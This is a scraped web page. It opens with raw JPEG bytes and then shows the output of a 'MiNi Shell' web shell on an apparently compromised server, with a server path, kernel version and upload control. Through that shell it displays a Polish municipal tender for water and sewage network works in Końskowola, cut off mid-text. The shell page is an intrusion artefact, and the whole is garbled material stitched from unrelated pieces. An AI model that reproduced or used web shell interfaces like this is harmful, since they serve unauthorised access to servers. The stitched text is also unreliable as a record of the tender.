JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210907/0017311401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rozbudowa sieci wodno-kanalizacyjnej na terenie Gminy Końskowola z podziałem na 3 zadania”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Końskowola</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019661</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pożowska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Końskowola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">24-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">818816201</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">818816202</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@konskowola.info.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ugkonskowola.bip.lubelskie.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rozbudowa sieci wodno-kanalizacyjnej na terenie Gminy Końskowola z podziałem na 3 zadania”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ff1f9c85-0be9-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00173114</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00017367/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Rozbudowa kanalizacji sanitarnej w m. Stara wieś</p> <p class="mb-0">1.1.9 Rozbudowa sieci wodociągowej i kanalizacyjnej w m. Skowieszyn ul. Graniczna</p> <p class="mb-0">1.1.10 Rozbudowa sieci wodociągowej w m. Witowice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gmina-konskowola.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gmina-konskowola.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym, a wykonawcą z uwzględnieniem wyjątków określonych w ustawie pzp odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej<br/>rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2019 r., poz. 123 i 730).2. Zamawiający wymaga złożenia oferty pod rygorem nieważności w postaci elektronicznej elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym za<br/>pośrednictwem Platformy dostępnej pod adresem https://gmina-konskowola.ezamawiajacy.pl 3. Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń,<br/>wniosków, zawiadomień oraz informacji elektronicznie na adres e mail:<br/>zamowienia@konskowola.info.pl lub za pośrednictwem Platformy znajdującej się pod adresem: https://gmina-konskowola.ezamawiajacy.pl w zakładce: „Pytania i odpowiedzi”. 4. Ogólne zasady<br/>korzystania z Platformy: zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://gmina-konskowola.ezamawiajacy.pl lub https://oneplace.marketplanet.pl.Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości<br/>zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych, dlatego też Zamawiający zaleca Wykonawcom uwzględnienie czasu<br/>niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej. Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. 5.Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.6.Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Składany wniosek można przesłać za<br/>pośrednictwem Platformy Zakupowej w zakładce "ZADAJ PYTANIE" ” lub przy użyciu zakładki „Korespondencja”. W celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić wszystkie<br/>dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ. Wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy "pytanie wysłane". 7.Zamawiający<br/>udzieli niezwłocznie odpowiedzi, jednak nie później niż na 2 dni przed upływem terminu składania ofert albo ofert podlegających negocjacjom, pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do Zamawiającego niepóźniej niż na 4 dni przed upływem terminu składania odpowiednio ofert albo<br/>ofert podlegających negocjacjom. Ewentualne przedłużenie terminu składania ofert, nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści SWZ. Treść zapytań wraz z wyjaśnieniami bądź informację o dokonaniu modyfikacji SWZ, Zamawiający przekaże Wykonawcom za pośrednictwem<br/>Platformy Zakupowej. 8. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma Zakupowa, tel. +48 22 576 22 23 (infolinia dostępna codziennie od<br/>poniedziałku do piątku w godz. od 9.00 do 17.00) e-mail: oneplace@marketplanet.pl9. Korzystanie z Platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, dalej zwanego „RODO”) informujemy, że:<br/>1.	Administratorem Danych Osobowych przetwarzanych w Urzędzie Gminy Końskowola, Końskowola, ul. Pożowska 3a, tel. 81 881 62 01, ugkonskowola@post.pl jest Wójt Gminy Końskowola. <br/>2.	Inspektorem Ochrony Danych Osobowych w Urzędzie Gminy Końskowola jest Roman Maruszak, tel. 81 881 62 01, kontakt e- mail: iodo@konskowola.info.pl<br/>3.	Podstawę prawną do przetwarzania przez administratora Pani/Pana danych osobowych stanowi art. 6 ust. 1 pkt c Rozporządzenia Parlamentu Europejskiego i Rady ( UE) 2016/679 z dnia 27 kwietnia 2016 r. oraz ustawa z 29 stycznia 2004 r. Prawo zamówień publicznych z późn. zm. ( Dz. U. z 2018 r. poz. 1986 z późn. zm.). Administrator Danych Osobowych przetwarza Pani/Pana dane w zakresie niezbędnym do realizacji celu, jakim jest postępowanie o udzielenie zamówienia publicznego na roboty budowlane pn.: „Rozbudowa sieci wodno-kanalizacyjnej na terenie Gminy Końskowola z podziałem na 3 zadania”, znak: ZP.271.1.8.2021.<br/>4.	Odbiorcą Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy pzp. Dane mogą być przekazane innym podmiotom publicznym, które z mocy przepisów prawa mają do tego uprawnienie.<br/>5.	Osoba, której dane osobowe dotyczą ma prawo: <br/>	dostępu do treści danych - art. 15 RODO, <br/>	ich sprostowania - art. 16 RODO⃰, <br/>	do ograniczenia przetwarzania z zastrzeżeniem, o którym mowa w art. 18 ust. 2 RODO. ⃰⃰ ⃰ <br/>6.	Nie przysługuje Pani/Panu prawo do:<br/>	usunięcia danych w związku z art. 17 ust. 3 lit. b, d lub e,<br/>	prawo do przenoszenia danych wynikające z art. 20 RODO,<br/>	prawo sprzeciwu wobec przetwarzania danych z uwagi na fakt, że podstawę przetwarzania stanowi art. 6 ust. 1 lit. c RODO.<br/>8.	Obowiązek podania przez Panią/Pana danych osobowych jest obowiązkiem ustawowym wynikającym z Pzp, konsekwencje niepodania określonych danych wynikają w Pzp,<br/>9.	W przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu danych osobowych, przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony danych osobowych tj. Prezesa Urzędu Ochrony Danych Osobowych. <br/>10.	Dane osobowe nie będą podlegały automatycznemu przetwarzaniu i profilowaniu.<br/>11.	Pani/Pana dane osobowe będą przechowywane przez czas niezbędny do realizacji celów, dla których dane te są przetwarzane, zgodnie z art. 78 ust. 1 ustawy pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata okres przechowywania obejmuje cały czas trwania umowy, oraz czas niezbędny do zapewnienia korzystania ze środków ochrony prawnej, praw innej lub innych osób fizycznych i prawnych, lub z uwagi na ważne względy interesu publicznego. <br/>12.	Ma Pani/Pan możliwość wglądu w swoje dane osobowe przetwarzane przez Urząd Gminy Końskowola w związku z realizacją zamówienia publicznego w siedzibie urzędu Wyjaśnienia<br/>* prawo do sprostowania danych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp, oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>⃰⃰⃰⃰⃰⃰ ⃰ prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innych osób fizycznych lub prawnych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I. Rozbudowa kanalizacji sanitarnej w m. Stara Wieś.<br/>Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu przyłącza kanalizacji sanitarnej w msc. Stara Wieś.<br/><br/>Zadanie polega na wykonaniu:<br/>- Przyłącza kanalizacji grawitacyjnej DZ160 PVC SN8 o długości L=~1,9m<br/>- Przyłącza ciśnieniowego kanalizacji sanitarnej tłocznej DZ50 PE100 SDR11 o<br/>długości – 162 m<br/>Szczegółowy opis przedmiotu zamówienia zawarty został w dokumentacji stanowiącej załącznik nr 1A do SWZ. Zamawiający informuje, że przedmiar robót udostępniony w załączniku nr 1A do SWZ ma charakter pomocniczy dla sporządzenia oferty. Wykonawca zobowiązany jest w ofercie uwzględnić wszystkie roboty zawarte w dokumentacji projektowej niezbędne do wykonania przedmiotu zamówienia zgodnie z obowiązującymi przepisami. Przedmiar robót nie stanowi podstawy do wyceny ofert. <br/>Wykonawca we własnym zakresie wykona odpowiednie zabezpieczenia i oznakowania robót.<br/>Przy realizacji zamówienia wykonawca może zastosować materiały lub urządzenia dowolnego producenta pod warunkiem, że materiały te i urządzenia posiadają parametry nie gorsze od opisanych w dokumentacji stanowiącej za łącznik nr 1A do SWZ.<br/>W przypadku niezgodności pomiędzy poszczególnymi elementami dokumentacji technicznej stanowiącymi załącznik nr 1A do SWZ, Zamawiający prosi o ich wskazywanie na etapie przed terminem składania ofert, aby Zamawiający mógł dokonać ich interpretacji w formie odpowiedzi na pytania. Po zawarciu umowy, w przypadku pojawienia się w/w rozbieżności, Zamawiający będzie dokonywał ich interpretacji na bieżąco, bez możliwości podwyższenia wynagrodzenia ryczałtowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W przedmiotowym postępowaniu, Zamawiający, przy wyborze oferty<br/>najkorzystniejszej zastosuje kryterium:1) Cena [C] 60% 2) Gwarancja [G] 40%2. Sposób obliczania punktów dla kryterium ceny :Poszczególny ofertom zostaną przyznane punkty za cenę obliczone wg<br/>poniższego wzoru:Cena oferty- max 60 pkt C = cena brutto oferty z najniższą ceną/cena<br/>brutto oferty badanej x 60 pkt Sposób obliczania punktów dla kryterium gwarancja: Poszczególnym<br/>ofertom zostaną przyznane punkty za długość okresu gwarancji z zastrzeżeniem że okres gwarancji<br/>nie może być krótszy niż 60 m-cy. Zamawiający informuje, iż poszczególnym ofertom zostaną<br/>przyznane punkty za długość okresu gwarancji z zastrzeżeniem, że jeżeli Wykonawca wskaże okres<br/>gwarancji krótszy niż60 m-cy, Zamawiający odrzuci ofertę Wykonawcy. Jeżeli Wykonawca nie wpisze<br/>okresu gwarancji to będzie to równoznaczne z zaoferowaniem okresu gwarancji 60 miesięcy i w takiej<br/>sytuacji Wykonawca nie otrzyma punktów w opisanym kryterium. W zawartej umowie zostanie wpisany<br/>okres gwarancji na podstawie informacji uzyskanych z formularza ofertowego.Punkty zostaną<br/>przyznane wg poniższego schematu:  60-66 miesięcy 0 pkt 67- 73 miesięcy 20 pkt 74 -80 miesięcy 40<br/>pkt Punkty zostaną przyznane na podstawie informacji zawartych w formularzu ofertowym. Kryterium<br/>gwarancja oceniany będzie na podstawie zadeklarowanego przez Wykonawcę okresu gwarancji<br/>(wyrażonego w pełnych miesiącach). Ostateczna ilość punktów dla każdej z ofert zostanie obliczona<br/>wg następującego wzoru:Łączna ilość punktów = C+G Maksymalnie oferta może otrzymać 100<br/>punktów.Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione powyżej kryteria<br/>oceny ofert. Oferta wypełniająca w najwyższym stopniu wymagania otrzyma maksymalną liczbę<br/>punktów. Pozostałym ofertom, wypełniającym wymagania kryterialne przypisana zostanie<br/>proporcjonalnie mniejsza liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty.<br/>Punkty będą liczone z dokładnością do dwóch miejsc po przecinku, zgodnie z regułą matematyczną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II. Rozbudowa sieci wodociągowej i kanalizacyjnej w m. Skowieszyn ul. Graniczna.<br/>Przedmiotem zamówienia są roboty budowlane budowy sieci wodociągowej, kanalizacji sanitarnej, w msc. Skowieszyn.<br/><br/>Zadanie polega na wykonaniu:<br/>- Sieci kanalizacji sanitarnej grawitacyjnej z rur DN200 PVC SN8 o łącznej<br/>długości 238,9m,<br/>- Sieci kanalizacji sanitarnej tłocznej z rur DZ90 PE100 o łącznej długości 2,65m,<br/>- Sieci wodociągowej z rur PE100 SDR11 o długości łącznej = 247m<br/>Szczegółowy opis przedmiotu zamówienia zawarty został w dokumentacji stanowiącej załącznik nr 1B do SWZ. Zamawiający informuje, że przedmiar robót udostępniony w załączniku nr 1B do SWZ ma charakter pomocniczy dla sporządzenia oferty. Wykonawca zobowiązany jest w ofercie uwzględnić wszystkie roboty zawarte w dokumentacji projektowej niezbędne do wykonania przedmiotu zamówienia zgodnie z obowiązującymi przepisami. Przedmiar robót nie stanowi podstawy do wyceny ofert. <br/>Wykonawca we własnym zakresie wykona odpowiednie zabezpieczenia i oznakowania robót.<br/>Przy realizacji zamówienia wykonawca może zastosować materiały lub urządzenia dowolnego producenta pod warunkiem, że materiały te i urządzenia posiadają parametry nie gorsze od opisanych w dokumentacji stanowiącej za łącznik nr 1B do SWZ.<br/>W przypadku niezgodności pomiędzy poszczególnymi elementami dokumentacji technicznej stanowiącymi załącznik nr 1B do SWZ, Zamawiający prosi o ich wskazywanie na etapie przed terminem składania ofert, aby Zamawiający mógł dokonać ich interpretacji w formie odpowiedzi na pytania. Po zawarciu umowy, w przypadku pojawienia się w/w rozbieżności, Zamawiający będzie dokonywał ich interpretacji na bieżąco, bez możliwości podwyższenia wynagrodzenia ryczałtowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W przedmiotowym postępowaniu, Zamawiający, przy wyborze oferty<br/>najkorzystniejszej zastosuje kryterium:1) Cena [C] 60% 2) Gwarancja [G] 40%2. Sposób 